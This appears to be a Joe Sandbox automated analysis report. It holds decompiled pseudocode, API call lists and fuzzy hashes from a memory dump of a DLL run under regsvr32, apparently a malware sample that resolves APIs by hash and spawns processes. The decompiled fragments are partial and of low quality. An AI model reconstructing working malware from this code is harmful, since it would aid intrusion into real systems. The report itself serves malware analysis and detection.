                  0x1800021cb
                  0x1800021d3
                  0x1800021e4
                  0x1800021ec
                  0x1800021f1
                  0x1800021f3
                  0x1800021f5
                  0x1800021fb
                  0x180002206
                  0x18000220e
                  0x18000221a
                  0x18000221c
                  0x180002222
                  0x18000222a
                  0x180002230
                  0x180002238
                  0x18000223d
                  0x18000223f
                  0x180002241
                  0x180002247
                  0x18000224b
                  0x18000224d
                  0x18000225b
                  0x180002262
                  0x18000226d
                  0x180002275
                  0x180002277
                  0x180002281
                  0x1800022a9

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlenmemcpymemset
                  • String ID: lJu
                  • API String ID: 1735321128-4100297759
                  • Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
                  • Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00000001180005DF8(long long __rbx, intOrPtr* __rcx, void* __r8) {
                  				signed long long _t88;
                  				long _t111;
                  				void* _t114;
                  				long _t117;
                  				void* _t121;
                  				void* _t122;
                  				long _t130;
                  				void* _t133;
                  
                  				 *((long long*)(_t121 + 0x18)) = __rbx;
                  				_t122 = _t121 - 0x30;
                  				_t88 =  *0x8000d4a0;
                  				r13d = 0;
                  				 *(__rcx + 0x5c) = r13d;
                  				 *(_t122 + 0x68) = r13d;
                  				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
                  				 *(_t122 + 0x60) = 4;
                  				E0000000118000459C(0x5431d47a, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e56;
                  				 *_t88();
                  				goto 0x80005e59;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e9d;
                  				_t10 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t10;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005ea0;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				 *(_t122 + 0x68) = r13d;
                  				 *(_t122 + 0x60) = r13d;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005eea;
                  				_t19 = _t122 + 0x68; // 0xa
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t19;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t133, _t130, _t111);
                  				if (_t88 == _t133) goto 0x80005fad;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005f43;
                  				_t27 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t27;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005f46;
                  				if (r13d == r13d) goto 0x80005f95;
                  				 *(_t122 + 0x60) =  *(_t122 + 0x60) >> 1;
                  				 *((intOrPtr*)(_t88 + _t88 * 2)) = r13w;
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t114, _t117);
                  				if (_t88 == _t133) goto 0x80005f8e;
                  				r8d =  *(_t122 + 0x60);
                  				r8d = r8d + 1;
                  				wcstombs(??, ??, ??);
                  				 *(__rcx + 0x20) = _t88;
                  				goto 0x80005f9d;
                  				goto 0x80005f9d;
                  				GetLastError();
                  				HeapFree(??, ??, ??);
                  				goto 0x80005fbc;
                  				goto 0x80005fbc;
                  				return GetLastError();
                  			}











                  0x180005df8
                  0x180005e04
                  0x180005e08
                  0x180005e19
                  0x180005e1f
                  0x180005e23
                  0x180005e2b
                  0x180005e31
                  0x180005e42
                  0x180005e4a
                  0x180005e52
                  0x180005e54
                  0x180005e5c
                  0x180005e6b
                  0x180005e73
                  0x180005e75
                  0x180005e7e
                  0x180005e81
                  0x180005e90
                  0x180005e99
                  0x180005e9b
                  0x180005ea3
                  0x180005ea9
                  0x180005eae
                  0x180005ebc
                  0x180005ec4
                  0x180005ec6
                  0x180005ecb
                  0x180005ece
                  0x180005ed1
                  0x180005edf
                  0x180005ee8
                  0x180005eea
                  0x180005ef8
                  0x180005f04
                  0x180005f13
                  0x180005f1b
                  0x180005f1d
                  0x180005f22
                  0x180005f28
                  0x180005f36
                  0x180005f3f
                  0x180005f41
                  0x180005f49
                  0x180005f56
                  0x180005f5a
                  0x180005f5f
                  0x180005f67
                  0x180005f73
                  0x180005f75
                  0x180005f80
                  0x180005f83
                  0x180005f88
                  0x180005f8c
                  0x180005f93
                  0x180005f95
                  0x180005fa5
                  0x180005fab
                  0x180005fb2
                  0x180005fce

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Alloc$ErrorFreeLastwcstombs
                  • String ID:
                  • API String ID: 4133724704-0
                  • Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
                  • Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 18%
                  			E00000001180003FCC(intOrPtr* __rcx) {
                  				void* __rbx;
                  				void* __rbp;
                  				long long* _t84;
                  				long long* _t85;
                  				void* _t87;
                  				intOrPtr* _t106;
                  				void* _t109;
                  
                  				_t84 =  *0x8000d4a0;
                  				_t106 = __rcx;
                  				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0;
                  				E0000000118000459C(0x3a7e805d, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000400e;
                  				 *_t84();
                  				goto 0x80004010;
                  				if (0 == 0) goto 0x80004151;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x8000414c;
                  				 *0x8000d028();
                  				if (0 != 0) goto 0x80004145;
                  				r8d = 0x1000;
                  				HeapAlloc(??, ??, ??);
                  				if (_t84 == 0) goto 0x80004133;
                  				E0000000118000459C(0x3cd8e449, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000408d;
                  				r8d = 0x1000;
                  				r8d =  <  ?  *((void*)(_t109 + 0x50)) : r8d;
                  				 *_t84();
                  				goto 0x8000408f;
                  				if (0 == 0) goto 0x800040b7;
                  				r8d =  *(_t109 + 0x58);
                  				r9d = 0;
                  				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60))));
                  				 *((intOrPtr*)(_t85 + 0x20))();
                  				r11d =  *(_t109 + 0x58);
                  				 *((intOrPtr*)(_t109 + 0x50)) =  *((intOrPtr*)(_t109 + 0x50)) - r11d;
                  				if (0 == 0) goto 0x800040bf;
                  				goto 0x80004059;
                  				GetLastError();
                  				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
                  				E0000000118000459C(0x3a7e805d, _t85,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t85 == 0) goto 0x800040ef;
                  				 *_t85();
                  				goto 0x800040f1;
                  				if (0 == 0) goto 0x80004101;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x80004110;
                  				goto 0x80004059;
                  				GetLastError();
                  				goto 0x80004110;
                  				HeapFree(??, ??, ??);
                  				if (0x102 != 0) goto 0x80004138;
                  				E000000011800085E4(_t87, __rcx,  *((intOrPtr*)(_t109 + 0x60)));
                  				goto 0x80004138;
                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60)))) + 0x10))();
                  				goto 0x80004166;
                  				goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000008;
                  				goto 0x80004166;
                  				if (GetLastError() != 0x2efe) goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000000;
                  				return 0;
                  			}










                  0x180003fda
                  0x180003fe1
                  0x180003fef
                  0x180003ff7
                  0x180003fff
                  0x18000400a
                  0x18000400c
                  0x180004012
                  0x18000401c
                  0x18000402e
                  0x180004036
                  0x18000403e
                  0x180004047
                  0x180004053
                  0x180004062
                  0x18000406a
                  0x180004070
                  0x180004083
                  0x180004089
                  0x18000408b
                  0x180004091
                  0x180004098
                  0x18000409d
                  0x1800040a0
                  0x1800040a6
                  0x1800040a9
                  0x1800040ae
                  0x1800040b3
                  0x1800040b5
                  0x1800040b7
                  0x1800040cd
                  0x1800040d8
                  0x1800040e0
                  0x1800040eb
                  0x1800040ed
                  0x1800040f3
                  0x1800040fa
                  0x1800040fc
                  0x180004101
                  0x180004109
                  0x180004118
                  0x180004120
                  0x18000412a
                  0x180004131
                  0x180004140
                  0x180004143
                  0x18000414a
                  0x18000414c
                  0x18000414f
                  0x18000415e
                  0x180004160
                  0x180004172

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
                  • String ID:
                  • API String ID: 2540544816-0
                  • Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
                  • Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E000000011800091F8(void* __ecx, long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r9, signed long long* _a8, void* _a16, void* _a24) {
                  				void* _t46;
                  				long _t52;
                  				void* _t54;
                  				signed long long _t67;
                  				long long _t69;
                  				signed long long* _t73;
                  				signed long long _t80;
                  				signed long long _t87;
                  				intOrPtr _t90;
                  				struct _FILETIME* _t91;
                  				void* _t98;
                  				void* _t103;
                  				signed long long _t104;
                  				signed long long* _t105;
                  
                  				_t103 = _t98;
                  				 *((long long*)(_t103 + 0x10)) = __rbx;
                  				 *((long long*)(_t103 + 0x18)) = __rsi;
                  				 *(_t103 + 8) =  *(_t103 + 8) & 0x00000000;
                  				 *((long long*)(_t103 - 0x18)) = _t103 + 8;
                  				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
                  				_t73 = _a8;
                  				if (_t73 == 0) goto 0x8000925e;
                  				_t87 = _t73 + 0x18;
                  				 *(_t73 + 0x20) = _t87;
                  				_a8[3] = _t87;
                  				_a8[2] = __rcx;
                  				_a8[1] = __rdx;
                  				 *_a8 =  *_a8 | 0xffffffff;
                  				if (_t46 != 0) goto 0x80009327;
                  				GetSystemTimeAsFileTime(_t91);
                  				EnterCriticalSection(??);
                  				_t104 = __rcx + 0x88;
                  				_t80 =  *(_t104 + 8);
                  				_a8[3] = _t104;
                  				_a8[4] = _t80;
                  				 *_t80 =  &(_a8[3]);
                  				_t67 =  &(_a8[3]);
                  				 *(_t104 + 8) = _t67;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0x1");
                  				E00000001180006C8C(__ecx, _t67, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
                  				_a8[6] = _t67;
                  				if (_a8[6] != 0) goto 0x80009331;
                  				_t52 = GetLastError();
                  				EnterCriticalSection(??);
                  				_t105 = _a8;
                  				_t69 =  *((intOrPtr*)(_t105 + 0x20));
                  				_t90 =  *((intOrPtr*)(_t105 + 0x18));
                  				 *_t69 = _t90;
                  				 *((long long*)(_t90 + 8)) = _t69;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0xffffffff");
                  				if (_t52 == 0) goto 0x80009331;
                  				if (_a8 == 0) goto 0x80009331;
                  				E00000001180002770(_t54, _a8);
                  				return _t52;
                  			}

















                  0x1800091f8
                  0x1800091fb
                  0x1800091ff
                  0x180009208
                  0x180009214
                  0x18000921b
                  0x180009221
                  0x18000922b
                  0x18000922d
                  0x180009231
                  0x18000923a
                  0x180009243
                  0x18000924c
                  0x180009255
                  0x180009260
                  0x18000926a
                  0x180009274
                  0x18000927f
                  0x180009286
                  0x18000928a
                  0x180009293
                  0x1800092a0
                  0x1800092ac
                  0x1800092b0
                  0x1800092b4
                  0x1800092ba
                  0x1800092cf
                  0x1800092d9
                  0x1800092e7
                  0x1800092f3
                  0x1800092f5
                  0x1800092fb
                  0x180009300
                  0x180009304
                  0x18000930c
                  0x18000930f
                  0x180009313
                  0x180009319
                  0x180009320
                  0x18000932a
                  0x18000932c
                  0x180009342

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
                  • String ID:
                  • API String ID: 3478816279-0
                  • Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
                  • Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ByteCharErrorHeapLastMultiWide$AllocFree
                  • String ID:
                  • API String ID: 2267670476-0
                  • Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
                  • Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00000001180009B7C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                  				intOrPtr _v40;
                  				long long _v56;
                  				void* _t32;
                  				intOrPtr _t33;
                  				void* _t55;
                  				WCHAR* _t63;
                  				WCHAR* _t66;
                  				CHAR* _t69;
                  
                  				_t32 = _t55;
                  				 *((long long*)(_t32 + 8)) = __rbx;
                  				 *((long long*)(_t32 + 0x10)) = __rbp;
                  				 *((long long*)(_t32 + 0x18)) = __rsi;
                  				 *((long long*)(_t32 + 0x20)) = __rdi;
                  				_t33 =  *0x8000d4a0;
                  				lstrlenA(_t69);
                  				lstrlenW(_t66);
                  				lstrlenW(_t63);
                  				r8d = __rbx + _t33 + 0x12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t33 == 0) goto 0x80009c2e;
                  				_v56 = __r8;
                  				__imp__wnsprintfW();
                  				r9d = 0;
                  				r8d = 0;
                  				E00000001180006754(__rbx, __rcx, _t33, __r8, __rdx,  *0x8000d490 + 0x80011438);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009c32;
                  				return _v40;
                  			}











                  0x180009b7c
                  0x180009b7f
                  0x180009b83
                  0x180009b87
                  0x180009b8b
                  0x180009b99
                  0x180009bb6
                  0x180009bbf
                  0x180009bca
                  0x180009bd9
                  0x180009bdf
                  0x180009beb
                  0x180009c00
                  0x180009c05
                  0x180009c0b
                  0x180009c0e
                  0x180009c17
                  0x180009c26
                  0x180009c2c
                  0x180009c52

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
                  • HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
                  • wnsprintfW.SHLWAPI ref: 0000000180009C05
                    • Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
                    • Part of subcall function 0000000180006754: CreateProcessW.KERNELBASE ref: 00000001800067F7
                    • Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
                    • Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
                    • Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877
                  • HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
                  • String ID:
                  • API String ID: 3150570956-0
                  • Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
                  • Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
                  				void* _t13;
                  				intOrPtr* _t39;
                  				intOrPtr _t41;
                  				CHAR* _t54;
                  				long long _t60;
                  				long long _t61;
                  				void* _t63;
                  				long _t69;
                  				long _t73;
                  				long long _t74;
                  				void* _t76;
                  				CHAR* _t79;
                  
                  				 *((long long*)(_t63 + 8)) = __rbx;
                  				 *((long long*)(_t63 + 0x10)) = _t60;
                  				 *((long long*)(_t63 + 0x18)) = __rsi;
                  				_t39 =  *0x8000d4a0;
                  				_t41 =  *((intOrPtr*)(_t39 + 8));
                  				_t13 = lstrlenA(_t79) + 1;
                  				r8d = _t13;
                  				HeapAlloc(_t76, _t73, _t69);
                  				_t74 = _t39;
                  				if (_t39 == __rsi) goto 0x80004eb7;
                  				HeapAlloc(??, ??, ??);
                  				_t61 = _t39;
                  				if (_t39 == __rsi) goto 0x80004ea9;
                  				E00000001180004994(_t39, _t41, __rcx);
                  				if (_t39 == __rsi) goto 0x80004e62;
                  				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
                  				_t6 = _t39 + 2; // 0x2
                  				E00000001180004994(_t39, _t41, _t6);
                  				if (_t39 == __rsi) goto 0x80004e8e;
                  				r8d = _t13 - r12d;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t41 + _t74)) = sil;
                  				lstrcpyA(_t54);
                  				goto 0x80004e9c;
                  				lstrcpyA(??, ??);
                  				 *_t61 = 0x2f;
                  				 *((intOrPtr*)(_t61 + 1)) = sil;
                  				 *__rdx = _t74;
                  				 *__r8 = _t61;
                  				goto 0x80004eb7;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}















                  0x180004dd0
                  0x180004dd5
                  0x180004dda
                  0x180004dec
                  0x180004df9
                  0x180004e0d
                  0x180004e0f
                  0x180004e14
                  0x180004e1a
                  0x180004e20
                  0x180004e2e
                  0x180004e34
                  0x180004e3a
                  0x180004e3f
                  0x180004e4a
                  0x180004e51
                  0x180004e53
                  0x180004e5a
                  0x180004e6b
                  0x180004e72
                  0x180004e77
                  0x180004e82
                  0x180004e86
                  0x180004e8c
                  0x180004e8e
                  0x180004e94
                  0x180004e98
                  0x180004e9c
                  0x180004ea4
                  0x180004ea7
                  0x180004eb1
                  0x180004ed5

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
                  • String ID:
                  • API String ID: 2951650171-0
                  • Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
                  • Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 29%
                  			E000000011800099F4(void* __ecx, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
                  				void* _v48;
                  				char _v56;
                  				char _v64;
                  				char _v72;
                  				intOrPtr _v80;
                  				long long _v88;
                  				void* __rdi;
                  				void* _t73;
                  				long long _t75;
                  				void* _t91;
                  				intOrPtr _t106;
                  				intOrPtr* _t115;
                  
                  				_t92 = __rsi;
                  				_a24 = __rbx;
                  				_a16 = __rdx;
                  				_t106 =  *((intOrPtr*)(__rcx + 0x40));
                  				_t75 = __rdx;
                  				r10d =  *(_t106 + 2) & 0x0000ffff;
                  				_t115 = __r8;
                  				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
                  				_t73 = __r10 + _t106 + 8;
                  				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
                  				E00000001180004ED8( *0x8000d498 ^ 0xecb028fc, _t73);
                  				goto 0x80009a53;
                  				if (_t73 == 0) goto 0x80009b5c;
                  				_t9 =  &_a8; // 0x52
                  				_t10 =  &_v56; // 0x12
                  				if (E000000011800094E0(__rdx, _t73, _t91, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
                  				_t11 = _t73 + 2; // 0x2
                  				if (_a8 - _t11 <= 0) goto 0x80009aa8;
                  				_t15 =  &_v64; // 0xa
                  				_t16 =  &_v48; // 0x1a
                  				E000000011800081F0(_a8, _t75, _v56, _t92, _t16, _t15, __r11);
                  				goto 0x80009aad;
                  				if (0x57 != 0) goto 0x80009b36;
                  				r13d = _v64;
                  				_t19 =  &_v72; // 0x2
                  				_t20 =  &_v64; // 0xa
                  				_v80 = r13d;
                  				_v72 =  *_t115;
                  				_v88 = _v48;
                  				if (E00000001180006EB0( *_t115, _t75, _t75, _t20, _t19) != 0) goto 0x80009b16;
                  				memcpy(??, ??, ??);
                  				 *_t115 = _v72;
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b1b;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				r8d = _a8;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b61;
                  				return 2;
                  			}















                  0x1800099f4
                  0x1800099f4
                  0x1800099f9
                  0x180009a0b
                  0x180009a16
                  0x180009a19
                  0x180009a36
                  0x180009a3c
                  0x180009a3e
                  0x180009a45
                  0x180009a4a
                  0x180009a4f
                  0x180009a56
                  0x180009a5c
                  0x180009a64
                  0x180009a77
                  0x180009a7d
                  0x180009a87
                  0x180009a95
                  0x180009a9a
                  0x180009a9f
                  0x180009aa6
                  0x180009aaf
                  0x180009ab5
                  0x180009ac2
                  0x180009ac7
                  0x180009acf
                  0x180009ad4
                  0x180009ad8
                  0x180009ae6
                  0x180009afc
                  0x180009b0b
                  0x180009b0e
                  0x180009b14
                  0x180009b23
                  0x180009b30
                  0x180009b36
                  0x180009b45
                  0x180009b54
                  0x180009b5a
                  0x180009b78

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
